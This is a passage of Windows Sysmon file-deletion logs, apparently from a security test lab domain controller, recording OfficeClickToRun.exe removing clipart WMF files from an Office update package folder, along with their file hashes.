23542300x800000000000000065663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105846.WMFMD5=BB8CD0D3ADCDF6B8F9F2BC849E8E0DF9,SHA256=A3458FCC0FA035B539D88F456A6A8A28C9390C8565A0E96C886E43847B642EC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105710.WMFMD5=45F12CAFD879C17BE18256E150F08417,SHA256=67260535E310FF32BA935D3313EBDB6293FADAA38AA4BACDE72E590D752A6711,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105638.WMFMD5=0DAEF4C4F141344A3528BD582CB3F4D4,SHA256=FBF503B811AD1E2D3A0CBE039E18E193DFFF0B5094FBA135306814AC4ACD3D16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105600.WMFMD5=C7C6BCCE332D4B57E031EC6B6B772F0D,SHA256=92EBDDE2887D7589BF1285AE76B3BC7314B10A2C0DC499F2DD4B1052D877A900,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105588.WMFMD5=8BB300CF21CD95146916EB45FA967A3B,SHA256=63D275FE5D5D1AEEE3D61662C489438F7D61E497B572FD6C407DF1E204F9502E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105530.WMFMD5=00E1AD007BB2C31C4318D2756FAAFC7B,SHA256=81D050AF99C7949AD181708B6FB31E24BD55E4FD8F31BF2F83C7B95F54FEEC5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105526.WMFMD5=36B19501DA5BE786CEC262EB5D07D9D3,SHA256=5166D94E5F3DACF703031E4E02478775BDDB817F9AD30CA0A03763EE819A21C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105520.WMFMD5=41FCF5A113BB5366A89270128A07D144,SHA256=E8B7F0E849134B38A4BB949682DDA7D427A5687B9DB21403DDC5FDB065BD7C27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105506.WMFMD5=507E8D3B91579751D96AB2BA4E49E978,SHA256=CBB6D15105E730FA0B686EFC4529362DF3753CE108B650971B3E09EE77E61D22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105504.WMFMD5=C1A8877646FC290D81BDB5B290E73BC1,SHA256=AE7420D5B055ED8BC60AE365107B5A0E900FF5FB7A57F73CBD2EA3CF80D3F6C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105502.WMFMD5=8E378EE3A10A4DA2D0C5A49F22E07145,SHA256=CD65CFD3D4D83A9DAF9B1021CD9B4603BD4312D56AF53FF2DAE74417C5CD5DD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105496.WMFMD5=DA8006AAD13BDFE8304446F579FC41EE,SHA256=2B7A193FE69B69A6B26831BD1AF1415690EFF6B5C01106B4A585ED227208CD4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105490.WMFMD5=EC168C0B19FF733AF7B5AAD07570F20C,SHA256=735354FEF0390124268E020B25A6B626AAA8CDE7EDA5E79F2A97CDAD668AFD6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105414.WMFMD5=8F2EB8F37F2E05F210ECF645EAB328CB,SHA256=1B5A06B342C49C583A64A100EE47B269672C7F44E98B9693D88EB9C478C8C8EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105412.WMFMD5=4709D5EA8D981C73BF8C126C4DCC53A3,SHA256=327A1EB2B240B3D1A1D04E845A0EF4970C2B3234F15E9B8C0628DF545401430B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105410.WMFMD5=4FB0FD3E8581B1FE2576D195FEB28BC8,SHA256=53FED022842F0524A0516597FA45E1238D25CC6A0CF491BBEEA2EAFAD32244EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105398.WMFMD5=472687ACB19666CBF38EC5DDFB918285,SHA256=1B050DDA2D67A9D55C0C1AC73897F2DDC5861BF017A55F1D1C1FDEA42BE2C4B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105396.WMFMD5=084C830EE7330EF503027F967FBC2525,SHA256=29D2E1B9BCED3C63039014B58200B836418C156DCDC868BD8B3D5FF61F7C7788,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105390.WMFMD5=ADF471D7B868F5B0C51B8277069A486C,SHA256=D597C66DDDD84525C80F5B1BC72490B9FC36590927D08ABFA6853E1ABBB8AB98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105388.WMFMD5=0AA34BA8A4B5386BFA38BCEF2AE9EDA5,SHA256=B65645593A47D3F66BE438FAF696D13F5EDCE96B80F3615315028630BC5A244A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105386.WMFMD5=B8D392C770B3B8AFE9DEF383029FB458,SHA256=E8A3D3B5C3741E36D90589A6F1D36D94B8491EFD6C03BACB89DC1C1A0C1B31C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105384.WMFMD5=470963083B788679DDCD965D608D33F2,SHA256=2FC19E18044F0306BED067CAFA8C5032A89EE8FA680616F973AE8B8B7B10E0F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105380.WMFMD5=60C63521C10CD2548A89D9318AA159FF,SHA256=F1067A8D89599432600153FF385430A189B8832BCC4773F186F5580149E360C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105378.WMFMD5=429750F9992A1254227A4FC45E5ED178,SHA256=18958D2BDBED5F523D02FA49D2F27EB7E1B3770F8E31E99D66C69D58F080BD63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105376.WMFMD5=9FE4717914C3C54BF1A493603730BE57,SHA256=7D70FC6095656580EBB674767F0145BD9B9AB35207CBA05A3520195836AD6CBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105368.WMFMD5=A94D1FB017F697AC6419E9F46F08F90F,SHA256=D3E4219BA1F9FAC56B93E50CFAB17C6C3066DCBC0AED4745387DE27D17B5C162,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105360.WMFMD5=65838BD6CE7F43D729A3A6944616321D,SHA256=A8A884387D636CBE0D3E07F47AEBC4F7EF75732757BC2D95616567AF40AA9407,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105348.WMFMD5=CFA5677F0C76D80296FA2E888EF7A028,SHA256=82E0F1747EEE528B4B4A71C7C04782FFA2C2B0078440AE9FEF377D043A75BBA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105338.WMFMD5=593CCFC7E0E754AC4B370674B39FC90A,SHA256=77C02035EE0F152EA02FBFDD576A938D37219D822BAD59854677A7794DFAB60E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105336.WMFMD5=9B0DB92D6CFA04B5F95624653B559095,SHA256=5E6E2B8BA1FBAC744A7105B4A5B6A951793624820ADF87186DEBDB39A979675D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105332.WMFMD5=05FB46A24744D28D52481CF38FDBE5C5,SHA256=7BD8A7D3AA0C71AFE319100040B8D9484CD12C17B396F9BB0D308EF8B0B2E8D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105328.WMFMD5=A0C25AF28719C99B4F53F1E94B74446F,SHA256=75534AFD9EC34D02E766A2DB370D09936E4A56A7576D327D25FBFBFCFF16C60C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105320.WMFMD5=1DBCAF6EC556BB7ACEA0170C096190AF,SHA256=E6EAE6B27F40C72CB26F937937953AF3592F243C2E872E300558D4D1EDB04829,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105306.WMFMD5=13A5F66AE7D4F9DF0953F1B0A0CCAA79,SHA256=6BF9FC089AA2C554D001F0EFF7247A9F133A4C574B9EA70B3E2119F4521AE5B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105298.WMFMD5=622A3706C973A6CF080AE181C600F67A,SHA256=70AE41B34BB27D613C0F803DA2F470B96EE5E353CE20FDC7C727A9FB03C38D87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105294.WMFMD5=DA844361E239E0A5770D2E37E5A2448F,SHA256=972611FA78DE7515CFEB98ECFE409B48D96B1EE5045707926EB4C2E212922A9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105292.WMFMD5=120967E98FF095A62B10A1D6F7B902A0,SHA256=C01647B5E79F83BA08E9B015209DE5671862CF172DC750A5357BB4853C5981EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105288.WMFMD5=F963B0BEFDD25AA5EDAEF61EEDB88669,SHA256=3FDC24DA587DB826776BF7A9BE5AB670DDBDB8A7A7EA31919925EDBE6F8A64EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105286.WMFMD5=F423ED2FC09B3D2E337244D3A42F49CD,SHA256=497603F27B9903A31625D6267300AE19D3AE3DF181A366D84D765E8D79C5E257,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105282.WMFMD5=D5FD5F292CA212CD8533A064CB4FB881,SHA256=FC296118C1D39C3BAA60C9E73886D43A9CC0FC22196345B90F2F58A805D30AA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105280.WMFMD5=A05A55A5C88D2627A59184A1E96A4DC6,SHA256=99D06584F75D113A2D970C9320DEEB3A0CB335414C038ECA9B97D6CD40ADEF66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105276.WMFMD5=D6C811D6806433228585024B7A9BB002,SHA256=9B926438B7AF049D31EF5B9404F588AAD942A5FB0D55BE4E2902422FFD479A66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105272.WMFMD5=F81D30A5287CE6BAA3B26BC7441E1C39,SHA256=CFF43CA24B9B6E7A7EC79DB155FC607108D7819012EEFFC4C5F122FBBCE27FE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105266.WMFMD5=ACA4222C623138E4E659F03F403314CF,SHA256=7EBF4954F49C30C15BBA53CC706B70DC747947A6D399CB49221C30D48F1D70AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 